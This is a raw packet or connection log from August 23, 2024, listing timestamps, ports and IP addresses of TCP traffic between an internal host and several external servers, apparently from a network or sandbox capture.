Aug 23, 2024 18:47:52.643486023 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.644393921 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.644404888 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.644460917 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.645529985 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.645540953 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.645575047 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.645590067 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.646646976 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.646657944 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.646667004 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.646701097 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.646713972 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.647752047 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.647808075 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.649420023 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.649471998 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.649719954 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.649775982 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.736669064 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.736738920 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.737025976 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.737035990 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.737067938 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.737087965 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.737833977 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.737844944 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.737884998 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.738832951 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.738884926 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.739350080 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.739362001 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.739397049 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.739417076 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.740462065 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.740473986 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.740504980 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.741478920 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.741489887 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.741520882 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.741539001 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.742762089 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.742773056 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.742804050 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.743885040 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.743895054 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.743906021 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.743946075 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.744759083 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.744771004 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.744810104 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.745949030 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.745964050 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.745974064 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.746001959 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.746032000 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.747112989 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.747123957 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.747176886 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.747220039 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.747957945 CEST	80	49736	199.191.50.83	192.168.2.4
Aug 23, 2024 18:47:52.747992992 CEST	49736	80	192.168.2.4	199.191.50.83
Aug 23, 2024 18:47:52.905960083 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.906016111 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.906145096 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.906157970 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.906191111 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.906209946 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.907152891 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.907165051 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.907192945 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.907213926 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.908210993 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.908230066 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.908256054 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.908256054 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.909483910 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.909499884 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.909508944 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.909528017 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.909729958 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.911372900 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.911416054 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.912003994 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.912014008 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:52.912039042 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.912053108 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:52.973829985 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.973893881 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.973927975 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.973974943 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.973985910 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.974025965 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.974733114 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.974841118 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.976180077 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.976227999 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.976269960 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.976308107 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.977214098 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.977261066 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.977318048 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.977364063 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.978408098 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.978456020 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.978519917 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.978564978 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.979368925 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.979420900 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.979779959 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.979829073 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.980159044 CEST	443	64278	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:52.980206966 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.997510910 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:52.997550964 CEST	64278	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:53.002748966 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.002800941 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.003309965 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.003364086 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.003437996 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.003477097 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.004051924 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.004065990 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.004101992 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.004829884 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.004843950 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.004874945 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.004884958 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.005717039 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.005731106 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.005762100 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.005791903 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.006594896 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.006623983 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.006640911 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.006661892 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.009160995 CEST	64285	80	192.168.2.4	91.195.240.19
Aug 23, 2024 18:47:53.014590979 CEST	80	64285	91.195.240.19	192.168.2.4
Aug 23, 2024 18:47:53.028350115 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:53.033937931 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:53.356293917 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:53.366779089 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:47:53.392613888 CEST	80	49731	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:53.392699957 CEST	49731	80	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:53.408994913 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:53.409024954 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:53.409245014 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:53.409349918 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:53.409358025 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:53.750860929 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:47:53.751638889 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:53.755738020 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:53.764921904 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:47:53.963397026 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:53.965445995 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.004406929 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.004445076 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.005435944 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.006366968 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.006416082 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.048505068 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.163615942 CEST	80	49660	154.212.231.82	192.168.2.4
Aug 23, 2024 18:47:54.165365934 CEST	49660	80	192.168.2.4	154.212.231.82
Aug 23, 2024 18:47:54.677076101 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.677124977 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.677161932 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.677184105 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.677212954 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.677253008 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.678230047 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.679112911 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.679197073 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.679205894 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.679264069 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.680700064 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.680757046 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.680763960 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.680807114 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.681827068 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.682404041 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.682410955 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.682451010 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.683170080 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.683212042 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.683222055 CEST	443	64286	188.114.96.3	192.168.2.4
Aug 23, 2024 18:47:54.683263063 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.698888063 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:47:54.698918104 CEST	64286	443	192.168.2.4	188.114.96.3
Aug 23, 2024 18:48:07.547801018 CEST	80	64273	162.255.119.102	192.168.2.4
Aug 23, 2024 18:48:07.547864914 CEST	64273	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:48:07.548890114 CEST	80	64273	162.255.119.102	192.168.2.4
Aug 23, 2024 18:48:07.548955917 CEST	64273	80	192.168.2.4	162.255.119.102
Aug 23, 2024 18:48:11.489068985 CEST	64284	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:48:11.490566969 CEST	64288	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:48:11.497817039 CEST	80	64288	5.79.71.225	192.168.2.4
Aug 23, 2024 18:48:11.497914076 CEST	64288	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:48:11.498024940 CEST	64288	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:48:11.505176067 CEST	80	64288	5.79.71.225	192.168.2.4
Aug 23, 2024 18:48:23.528835058 CEST	64288	80	192.168.2.4	5.79.71.225
Aug 23, 2024 18:48:23.585310936 CEST	64289	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:48:23.604079008 CEST	80	64289	13.248.169.48	192.168.2.4
Aug 23, 2024 18:48:23.604156971 CEST	64289	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:48:23.604293108 CEST	64289	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:48:23.622345924 CEST	80	64289	13.248.169.48	192.168.2.4
Aug 23, 2024 18:48:23.628222942 CEST	49663	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:23.628503084 CEST	64290	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:23.643774986 CEST	80	64290	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:23.643846989 CEST	64290	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:23.643982887 CEST	64290	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:23.647880077 CEST	80	49663	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:23.647936106 CEST	49663	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:23.660130024 CEST	80	64290	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:23.798336029 CEST	64291	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:23.809946060 CEST	80	64291	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:23.810062885 CEST	64291	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:23.810475111 CEST	64291	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:23.825388908 CEST	80	64291	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:23.934258938 CEST	51112	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:23.934597969 CEST	64292	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:23.943233013 CEST	80	64292	103.150.11.230	192.168.2.4
Aug 23, 2024 18:48:23.943331957 CEST	64292	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:23.943445921 CEST	64292	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:23.946724892 CEST	80	51112	103.150.11.230	192.168.2.4
Aug 23, 2024 18:48:23.946782112 CEST	51112	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:23.951318026 CEST	80	64292	103.150.11.230	192.168.2.4
Aug 23, 2024 18:48:24.316374063 CEST	80	64291	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:24.316430092 CEST	64291	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:24.316848993 CEST	80	64291	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:24.316900015 CEST	64291	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:24.317604065 CEST	64291	80	192.168.2.4	18.208.156.248
Aug 23, 2024 18:48:24.322824955 CEST	80	64291	18.208.156.248	192.168.2.4
Aug 23, 2024 18:48:24.434413910 CEST	80	64290	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:24.434472084 CEST	64290	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:24.440253019 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:24.440290928 CEST	443	64293	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:24.440357924 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:24.440701008 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:24.440716028 CEST	443	64293	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:24.867440939 CEST	80	64292	103.150.11.230	192.168.2.4
Aug 23, 2024 18:48:24.867558002 CEST	64292	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:24.868246078 CEST	64294	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:24.873903036 CEST	8001	64294	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:24.874039888 CEST	64294	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:24.874914885 CEST	64294	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:24.880448103 CEST	8001	64294	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:24.955773115 CEST	443	64293	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:24.955878019 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:24.958307981 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:24.958317041 CEST	443	64293	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:24.958549023 CEST	443	64293	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:24.958611012 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:24.958962917 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:25.000510931 CEST	443	64293	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:25.988528967 CEST	8001	64294	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:25.988651991 CEST	64294	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:25.988740921 CEST	64294	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:25.988768101 CEST	64294	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:25.989248991 CEST	8001	64294	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:25.990607977 CEST	64292	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:25.990643978 CEST	64294	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:25.997631073 CEST	8001	64294	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:25.997648954 CEST	80	64292	103.150.11.230	192.168.2.4
Aug 23, 2024 18:48:25.997670889 CEST	64294	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:26.313071966 CEST	80	64292	103.150.11.230	192.168.2.4
Aug 23, 2024 18:48:26.313142061 CEST	64292	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:26.314218044 CEST	64295	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:26.319768906 CEST	8001	64295	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:26.319853067 CEST	64295	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:26.319967985 CEST	64295	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:26.330687046 CEST	8001	64295	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:27.443833113 CEST	8001	64295	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:27.444004059 CEST	64295	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:27.444540024 CEST	8001	64295	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:27.444592953 CEST	64295	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:27.445045948 CEST	64295	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:27.445070028 CEST	64295	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:27.460136890 CEST	8001	64295	106.15.137.66	192.168.2.4
Aug 23, 2024 18:48:27.460232973 CEST	64295	8001	192.168.2.4	106.15.137.66
Aug 23, 2024 18:48:27.686837912 CEST	443	64293	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:27.686888933 CEST	443	64293	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:27.686908007 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:27.686939001 CEST	443	64293	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:27.686952114 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:27.686995983 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:27.687546968 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:27.687572002 CEST	64293	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:27.689261913 CEST	64290	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:27.710093021 CEST	80	64290	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:28.798979044 CEST	80	64290	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:28.799086094 CEST	64290	80	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:28.803201914 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:28.803240061 CEST	443	64296	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:28.803339005 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:28.803613901 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:28.803631067 CEST	443	64296	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:29.316715002 CEST	443	64296	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:29.316797972 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:29.318392038 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:29.318402052 CEST	443	64296	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:29.318725109 CEST	443	64296	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:29.318783998 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:29.319072008 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:29.360505104 CEST	443	64296	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:31.042572021 CEST	443	64296	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:31.042634964 CEST	443	64296	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:31.042797089 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:31.042810917 CEST	443	64296	188.114.97.3	192.168.2.4
Aug 23, 2024 18:48:31.042854071 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:31.043170929 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:31.043198109 CEST	64296	443	192.168.2.4	188.114.97.3
Aug 23, 2024 18:48:31.166410923 CEST	80	64292	103.150.11.230	192.168.2.4
Aug 23, 2024 18:48:31.166516066 CEST	64292	80	192.168.2.4	103.150.11.230
Aug 23, 2024 18:48:31.622567892 CEST	64289	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:48:31.623914003 CEST	64297	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:48:31.629445076 CEST	80	64297	13.248.169.48	192.168.2.4
Aug 23, 2024 18:48:31.629517078 CEST	64297	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:48:31.629614115 CEST	64297	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:48:31.635941029 CEST	80	64297	13.248.169.48	192.168.2.4
Aug 23, 2024 18:48:35.640695095 CEST	64297	80	192.168.2.4	13.248.169.48
Aug 23, 2024 18:48:35.693989992 CEST	64298	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:35.702570915 CEST	80	64298	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:35.702642918 CEST	64298	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:35.702896118 CEST	64298	80	192.168.2.4	44.221.84.105
Aug 23, 2024 18:48:35.706038952 CEST	64299	80	192.168.2.4	15.197.240.20
Aug 23, 2024 18:48:35.707006931 CEST	51124	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:35.707248926 CEST	64300	80	192.168.2.4	64.225.91.73
Aug 23, 2024 18:48:35.710833073 CEST	80	64298	44.221.84.105	192.168.2.4
Aug 23, 2024 18:48:35.713836908 CEST	80	64299	15.197.240.20	192.168.2.4
Aug 23, 2024 18:48:35.713936090 CEST	64299	80	192.168.2.4	15.197.240.20
Aug 23, 2024 18:48:35.714055061 CEST	64299	80	192.168.2.4	15.197.240.20
Aug 23, 2024 18:48:35.714252949 CEST	80	51124	64.225.91.73	192.168.2.4
Aug 23, 2024 18:48:35.714265108 CEST	80	64300	64.225.91.73	192.168.2.4
